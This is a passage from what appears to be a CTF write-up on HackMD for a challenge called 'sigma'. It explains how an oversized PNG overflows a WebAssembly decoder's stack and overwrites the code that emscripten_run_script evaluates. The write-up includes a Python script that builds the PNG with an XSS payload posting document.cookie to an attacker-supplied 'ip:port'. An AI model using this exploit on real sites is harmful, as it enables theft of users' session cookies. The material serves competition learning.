# sigma Take a look at _emscripten_run_script Pass a 30 to 40 KB png, you can see that the console reports Uncaught (in promise) RuntimeError: Aborted(Stack overflow! Stack cookie has been overwritten, expected hex dwords 0x89BACDFE and 0x2135467, but received 0xa37a4d42 a383), and found a block of wasm Memory is overwritten by png data It is probably to construct a png, so that the memory read by call $env.emscripten_run_script is overwritten when this wasm is parsed ![](https://i.imgur.com/Dertm2b.png) Wasm will convert PNG to RGBA and store it somewhere, this place is implemented like a stack Try to construct a png to see what the stack looks like (The parts at the end of DD in the picture are all PNG files constructed by me) ![](https://i.imgur.com/nMZBp20.png) A little further up from this place is the place where run_script will read the js code. ![](https://i.imgur.com/BCahXFi.png) When the PNG pixels are larger than 750000, the stack will overflow, and when the PNG pixels are about 750859 pixels, the cookie in the error message will be overwritten. Probably this means that the stack overflow overwrites the code to be read by run_script, and that code will eventually be eval This picture is a PNG of 750,000 pixels, and the address below is 2242832+3000032. At the beginning, he has to verify whether it has been overwritten (probably to check for overflow?), so the pixel RGBA after the constructed PNG with 750,000 pixels must meet the original memory of 750,000 pixels Content ![](https://i.imgur.com/EbwE2Yd.png) then use xss payload ```python from PIL import Image import random qwq = [] def num2color(n): ret = [] while True: s = n // 256 ret.append(n % 256) if s==0: break n = s ret.reverse() while len(ret) <3: ret = [0] + ret return tuple(ret) for i in range(1 * 750000): #u = (*num2color(i), 0xcc) u = (0,0,0,0xcc) qwq.append(u) origin_mem = "\x42\x20\x04\x42\xEF\xBE\xAD\xDE\x8B\x59\x00\x00\x58\x0D\x50\x00" origin_mem += "-+ 0X0x\00-0X+0X 0X-0x+0x 0x\00!num_bits\00tinfl_decompress\00nan\00inf\00miniz.c\00NAN\00INF\00.\00II*\00fetch('//{ip:port}', {mode: 'no-cors', method: 'POST', body: JSON.stringify(document.cookie)});\00(null" print(len(origin_mem)) assert(len(origin_mem) % 4 == 0) pic = Image.new("RGBA", (1, 750000+len(origin_mem))) for i in range(len(origin_mem)//4): data = origin_mem[i*4:i*4+4] pixel = ( 255-ord(data[0]), 255-ord(data[1]), 255-ord(data[2]), ord(data[3]) ) qwq.append(pixel) pic.putdata(qwq) pic.save("./out.png", "PNG") ```
Last changed by  
crazyman
r3kapig摸鱼划水人 平常喜欢做做misc以及取证类题目 现在在学习逆向和pwn 密码等方向 比较菜 呜呜呜呜
661

Read more

西湖论剑-Isolated Machine Memory Analysis Writeup

本文赛后与zysgmzb共同完成 Isolated Machine Memory Analysis: 题目名称: Isolated Machine Memory Analysis 题目内容: 张三,现用名叫Charlie,在一家外企工作,负责flag加密技术的研究。为了避免flag泄露,这家企业制定了严格的安全策略,严禁flag离开研发服务器,登录服务器必须经过跳板机。张三使用的跳板机是一台虚拟机,虽然被全盘加密没法提取,但好消息是至少还没关机。 免责声明:本题涉及的人名、单位名、产品名、域名及IP地址等均为虚构,如有雷同纯属巧合。 注:本题模拟真实研发环境,解题有关的信息不会出现在人名、域名或IP地址等不合常理的地方。链接:https://pan.baidu.com/s/1WESej-pyjWKZni7drZGTig?pwd=cq46 提取码:cq46 题目难度:

3/1/2023
Insomni'hack teaser 2023 - Autopsy:

In the Lunar New Year, I played Insomni'hack teaser 2023, one of the topics labeled forensics, realistic, windows aroused my interest, I solved him. And I learned some knowledge from it. This is the record writeup Autopsy: Wireshark loads through the export object and selects http, save all and then filters to get three files SYSTEM, SECURITY, ntds.dit Then after searching, you can learn some relevant content about credential extraction https://github.com/SecureAuthCorp/impacket Through some things made by secretdump.py, it seems that it is not very useful. But it may be used to extract the key to decrypt the traffic

1/23/2023
idek 2022* CTF Pyjail && Pyjail Revenge Writeup

Pyjail: The code looks like this blocklist = ['.', '\\', '[', ']', '{', '}',':'] DISABLE_FUNCTIONS = ["getattr", "eval", "exec", "breakpoint", "lambda", "help"] DISABLE_FUNCTIONS = {func: None for func in DISABLE_FUNCTIONS} There is a blocklist ban off '.' , '\\', '[', ']', '{', '}', ':'. Then there is a DISABLE_FUNCTIONS that registers None objects for 'getattr', 'eval', 'exec', 'breakpoint', 'lambda', 'help' and overrides the corresponding functions in __builtins__. Also, the file name is jail.py, and the one in docker is also jail, so you can use __import__('jail'), but you may have to type it twice, so it's better to use __import__(__main__). Also flag sets permission not to read directly and then gives a readflag, called with the argument /readflag giveflag Also, this question can be executed in multiple lines, so you can do something like emptying the blocklist as follows

1/18/2023
idek CTF 2022* Forensics - HiddenGem Mixtape Writeup

This week is the Preliminary Eve in China, and most of my time is resting and partying. At the same time, there are some good challenges in idek CTF, among which I prefer the HiddenGem Mixtape series of challenges. Since I am a forensics enthusiast, and I I am also a malware analyst. So I prefer this challenge that is close to the realworld. Although some people may feel that this challenge is strange,guessing. Including some designs that may confuse the players. I hope my writeup can let you learn more much.Let's gooooo And a digression: szymex73 so strong! █Bquanman█ so strong! HiddenGem Mixtape: After downloading the file, we got three files 2023-01-07T194857_HiddenGem.zip,Note.txt,HiddenGem.7z 2023-01-07T194857_HiddenGem.zip after decompression is 2023-01-07T194857_HiddenGem.vhdx Note.txt:

1/16/2023
Read more from crazyman
Published on HackMD